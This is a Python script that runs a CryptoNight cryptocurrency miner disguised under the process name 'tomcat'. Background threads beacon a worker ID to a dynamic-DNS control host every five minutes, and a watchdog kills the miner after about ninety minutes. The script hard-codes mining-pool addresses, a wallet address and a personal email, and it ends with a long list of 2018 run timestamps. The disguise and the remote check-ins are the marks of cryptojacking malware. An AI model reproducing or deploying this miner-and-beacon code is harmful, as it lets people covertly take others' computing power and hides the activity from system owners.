import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:04.289014
#2018-02-17 16:54:07.140499
#2018-02-17 18:29:06.461510
#2018-02-17 20:02:04.635743
#2018-02-17 21:36:05.306713
#2018-02-17 23:05:07.478882
#2018-02-18 00:41:07.439622
#2018-02-18 02:19:06.876762
#2018-02-18 03:49:06.930608
#2018-02-18 05:22:04.762235
#2018-02-18 07:00:01.543520
#2018-02-18 08:30:10.059174
#2018-02-18 10:02:06.111972
#2018-02-18 11:34:07.107994
#2018-02-18 13:06:04.979417
#2018-02-18 14:41:05.120933
#2018-02-18 16:17:06.946970
#2018-02-18 17:49:06.926540
#2018-02-18 19:21:01.876079
#2018-02-18 20:52:07.016786
#2018-02-18 22:25:07.173892
#2018-02-19 00:01:05.258589
#2018-02-19 01:30:08.370025
#2018-02-19 03:04:07.038130
#2018-02-19 04:37:06.185274
#2018-02-19 06:08:05.825054
#2018-02-19 07:45:04.180939
#2018-02-19 09:19:05.782549
#2018-02-19 10:50:11.565184
#2018-02-19 12:22:06.882993
#2018-02-19 13:56:08.028722
#2018-02-19 15:31:04.408406
#2018-02-19 17:03:05.634463
#2018-02-19 18:36:08.799472
#2018-02-19 20:09:07.063433
#2018-02-19 21:47:06.820742
#2018-02-19 23:17:06.875275
#2018-02-20 00:49:05.136453
#2018-02-20 02:29:06.386483
#2018-02-20 04:04:07.305825
#2018-02-20 05:31:03.958573
#2018-02-20 07:03:03.480279
#2018-02-20 08:39:01.651513
#2018-02-20 10:10:08.584952
#2018-02-20 11:41:10.156515
#2018-02-20 13:19:01.312434
#2018-02-20 14:48:06.611757
#2018-02-20 16:22:04.768192
#2018-02-20 17:56:08.824022
#2018-02-20 19:33:06.838993
#2018-02-20 21:10:10.739834
#2018-02-20 22:41:06.520383
#2018-02-21 00:11:05.397707
#2018-02-21 01:50:01.327882
#2018-02-21 03:24:07.098977
#2018-02-21 04:58:06.518440
#2018-02-21 06:34:06.641955
#2018-02-21 08:08:07.275005
#2018-02-21 09:44:01.326965
#2018-02-21 11:20:04.374021
#2018-02-21 12:53:02.008356
#2018-02-21 14:26:05.473110
#2018-02-21 15:57:06.854393
#2018-02-21 17:36:06.737496
#2018-02-21 19:05:02.215435
#2018-02-21 20:41:01.826852
#2018-02-21 22:19:07.403560
#2018-02-21 23:53:06.439243
#2018-02-22 01:29:01.659401
#2018-02-22 03:04:04.666154
#2018-02-22 04:33:01.348170
#2018-02-22 06:07:01.545097
#2018-02-22 07:39:07.643930
#2018-02-22 09:15:04.860948
#2018-02-22 10:48:08.356046
#2018-02-22 12:19:01.677682
#2018-02-22 13:52:08.809541
#2018-02-22 15:28:01.460732
#2018-02-22 16:57:09.729738
#2018-02-22 18:36:09.666230
#2018-02-22 20:14:01.820050
#2018-02-22 21:45:03.056319
#2018-02-22 23:17:06.244128
#2018-02-23 00:50:09.612728
#2018-02-23 02:24:07.297412
#2018-02-23 03:54:05.982125
#2018-02-23 05:41:04.522709
#2018-02-23 07:25:08.614708
#2018-02-23 09:30:01.514114
#2018-02-23 11:36:08.270366
#2018-02-23 13:26:09.047748
#2018-02-23 15:12:01.662840
#2018-02-23 17:00:12.274414
#2018-02-23 18:49:06.888693
#2018-02-23 20:36:07.329731
#2018-02-23 22:24:07.567170
#2018-02-24 00:11:06.128720
#2018-02-24 02:02:04.718230
#2018-02-24 03:52:03.687025
#2018-02-24 05:38:03.450927
#2018-02-24 07:26:04.114347
#2018-02-24 09:15:04.089154
#2018-02-24 11:13:01.803803
#2018-02-24 13:02:06.239645
#2018-02-24 14:49:06.470077
#2018-02-24 16:41:05.160696
#2018-02-24 18:29:06.849161
#2018-02-24 20:15:10.000352
#2018-02-24 22:05:06.711227
#2018-02-25 02:27:07.964720
#2018-02-25 06:06:08.399957
#2018-02-25 11:38:01.710390